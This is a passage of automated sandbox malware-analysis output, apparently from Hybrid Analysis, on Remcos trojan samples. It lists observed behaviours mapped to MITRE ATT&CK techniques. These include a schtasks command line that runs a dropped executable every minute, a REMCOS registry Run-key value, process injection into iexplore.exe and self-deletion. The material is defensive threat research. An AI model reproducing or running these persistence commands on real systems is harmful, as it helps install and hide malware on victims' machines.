\"2617311798\"\n \"cx\": \"447\"\n \"cy\": \"25\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"FindFirstFileW\" with parameter C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe:Zone.Identifier (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\schtasks.* (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"FindNextFileW\" with parameter schtasks.exe (UID: 00000000-00003444)\n \"WScript.exe\" called \"FindFirstFileW\" with parameter C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe (UID: 00000000-00003092)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"WScript.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" opened \"\\Device\\KsecDD\"\n \"schtasks.exe\" opened \"\\Device\\KsecDD\"\n \"Dxpserver.exe\" opened \"\\Device\\KsecDD\"\n \"remcos.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"WScript.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\CRYPT32\"; Key: \"DEBUGHEAPFLAGS\"; Value: \"\")\n \"WScript.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\CRYPT32\"; Key: \"DIAGLEVEL\"; Value: \"\")\n \"WScript.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\CRYPT32\"; Key: \"DIAGMATCHANYMASK\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" claimed CRC 909820 while the actual is CRC 1149674\n \"remcos.exe.bin\" claimed CRC 909820 while the actual is CRC 1152615", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"REMCOS\"; Value: \"\"%APPDATA%\\remcos\\remcos.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"remcos.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Dxpserver.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Dxpserver.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\adprovider\\Dxpserver.exe]- [targetUID: 00000000-00003444]\n \"remcos.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\remcos\\remcos.exe]- [targetUID: 00000000-00003032]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" wrote 961 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\adprovider\\Dxpserver.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" has section name .text with entropy \"6.67611805852\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" has section name .reloc with entropy \"6.77903165045\"\n \"remcos.exe.bin\" has section name .text with entropy \"6.67611805852\"\n \"remcos.exe.bin\" has section name .reloc with entropy \"6.77903165045\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"WScript.exe\" marked \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"WScript.exe\" opened \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (UID: 00000000-00003444)\n Spawned process \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (UID: 00000000-00003032)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003092)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" /sc minute /mo 1 /F\" (UID: 00000000-00002908)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00001212)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005216)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005116)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005492)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00003312)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005532)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" /sc minute /mo 1 /F\" (UID: 00000000-00005720)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" /sc minute /mo 1 /F\" (UID: 00000000-00005352)\n Spawned process \"remcos.exe\" (UID: 00000000-00005804)\n Spawned process \"remcos.exe\" (UID: 00000000-00004900)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005644)\n Spawned process \"Dxpserver.exe\" (UID: 00000000-00005640)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005888)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" /sc minute /mo 1 /F\" (UID: 00000000-00005920)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" /sc minute /mo 1 /F\" (UID: 00000000-00006032)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn cttunesvr /tr \"%APPDATA%\\\\adprovider\\\\Dxpserver.exe\" /sc minute /mo 1 /F\" (UID: 00000000-00005860)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "mutant-1", "type": 4, "relevance": 7, "name": "Creates a mutant that is known to appear in malware", "description": "\"remcos_\" in \"Remcos\"", "origin": "Created Mutant"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" wrote 32 bytes to a remote process \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Handle: 272)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" wrote 52 bytes to a remote process \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Handle: 272)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" wrote 4 bytes to a remote process \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Handle: 272)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" wrote 131072 bytes to a remote process \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Handle: 272)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 712)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 712)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 712)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 600)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 600)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 600)\n \"Dxpserver.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\adprovider\\Dxpserver.exe\" (Handle: 272)\n \"Dxpserver.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\adprovider\\Dxpserver.exe\" (Handle: 272)\n \"Dxpserver.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\adprovider\\Dxpserver.exe\" (Handle: 272)\n \"Dxpserver.exe\" wrote 131072 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\adprovider\\Dxpserver.exe\" (Handle: 272)\n \"Dxpserver.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 704)\n \"Dxpserver.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 704)\n \"Dxpserver.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 704)\n \"Dxpserver.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\adprovider\\Dxpserver.exe\" (Handle: 268)\n \"Dxpserver.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\adprovider\\Dxpserver.exe\" (Handle: 268)\n \"Dxpserver.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\adprovider\\Dxpserver.exe\" (Handle: 268)\n \"Dxpserver.exe\" wrote 131072 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\adprovider\\Dxpserver.exe\" (Handle: 268)\n \"Dxpserver.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 700)\n \"Dxpserver.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 700)\n \"Dxpserver.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 700)\n \"Dxpserver.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 628)\n \"Dxpserver.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 628)\n \"Dxpserver.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\wscript.exe\" (Handle: 628)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\remcos\\remcos.exe\" (Handle: 268)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\remcos\\remcos.exe\" (Handle: 268)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\remcos\\remcos.exe\" (Handle: 268)\n \"remcos.exe\" wrote 131072 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\remcos\\remcos.exe\" (Handle: 268)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 700)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 700)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 700)\n \"remcos.exe\" wrote 32 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 200)\n \"remcos.exe\" wrote 52 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 200)\n \"remcos.exe\" wrote 4 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 200)\n \"remcos.exe\" wrote 1024 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 200)\n \"remcos.exe\" wrote 581120 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 200)\n \"remcos.exe\" wrote 188928 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 200)\n \"remcos.exe\" wrote 20992 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 200)\n \"remcos.exe\" wrote 293376 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 200)\n \"remcos.exe\" wrote 29184 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" (Handle: 200)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" allocated memory in \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"Dxpserver.exe\"\n \"send@WS2_32.DLL\" in \"remcos.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Exploit/Shellcode", "identifier": "stream-38", "type": 1, "relevance": 8, "name": "Writes shellcode to a remote process", "description": "Wrote 54 instructions to a remote process\n Wrote 72 instructions to a remote process\n Wrote 4 instructions to a remote process\n Wrote 20 instructions to a remote process\n Wrote 148 instructions to a remote process\n Wrote 41 instructions to a remote process\n Wrote 16 instructions to a remote process\n Wrote 29 instructions to a remote process\n Wrote 38 instructions to a remote process\n Wrote 18 instructions to a remote process\n Wrote 12 instructions to a remote process\n Wrote 151 instructions to a remote process\n Wrote 40 instructions to a remote process\n Wrote 73 instructions to a remote process\n Wrote 26 instructions to a remote process\n Wrote 3 instructions to a remote process\n Wrote 60 instructions to a remote process\n Wrote 2 instructions to a remote process\n Wrote 5 instructions to a remote process\n Wrote 37 instructions to a remote process\n Wrote 39 instructions to a remote process\n Wrote 111 instructions to a remote process\n Wrote 53 instructions to a remote process\n Wrote 25 instructions to a remote process\n Wrote 13 instructions to a remote process\n Wrote 32 instructions to a remote process\n Wrote 221 instructions to a remote process\n Wrote 42 instructions to a remote process\n Wrote 1 instructions to a remote process\n Wrote 22 instructions to a remote process\n Wrote 69 instructions to a remote process\n Wrote 58 instructions to a remote process\n Wrote 275 instructions to a remote process\n Wrote 31 instructions to a remote process\n Wrote 14 instructions to a remote process\n Wrote 9 instructions to a remote process\n Wrote 91 instructions to a remote process\n Wrote 11 instructions to a remote process\n Wrote 46 instructions to a remote process\n Wrote 135 instructions to a remote process\n Wrote 44 instructions to a remote process", "origin": "Hybrid Analysis Technology", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d
https://hybrid-analysis.com/sample/24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d
Hybrid Analysis - Remcos
{"size": 494592, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d", "sha256": "24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d", "av_detect": 88, "vx_family": "Remcos.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 2, "total_processes": 1, "total_signatures": 217, "extracted_files": [{"name": "json_1_.json", "file_size": 961, "sha256": "f034cf28aef4bdc3ae5e9515b5c052ba4374e32d3a6f9463da965b5ea8a70963", "type_tags": ["data"], "description": "JSON data", "runtime_process": "24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe (PID: 4744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24247)", "100 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24247)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "34 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "58 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24237)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (100 files)"], "total_file_compositions_imports": 318}, "processes": [{"uid": "00000000-00004744", "name": "24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe", "normalized_path": "C:\\24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe", "sha256": "24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 22}], "mitre_attcks": [{"tactic": "Reconnaissance", "technique": "IP Addresses", "attck_id": "T1590.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1590/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Gather Victim Network Information", "attck_id": "T1590", "attck_id_wiki": "https://attack.mitre.org/techniques/T1590"}}, {"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", 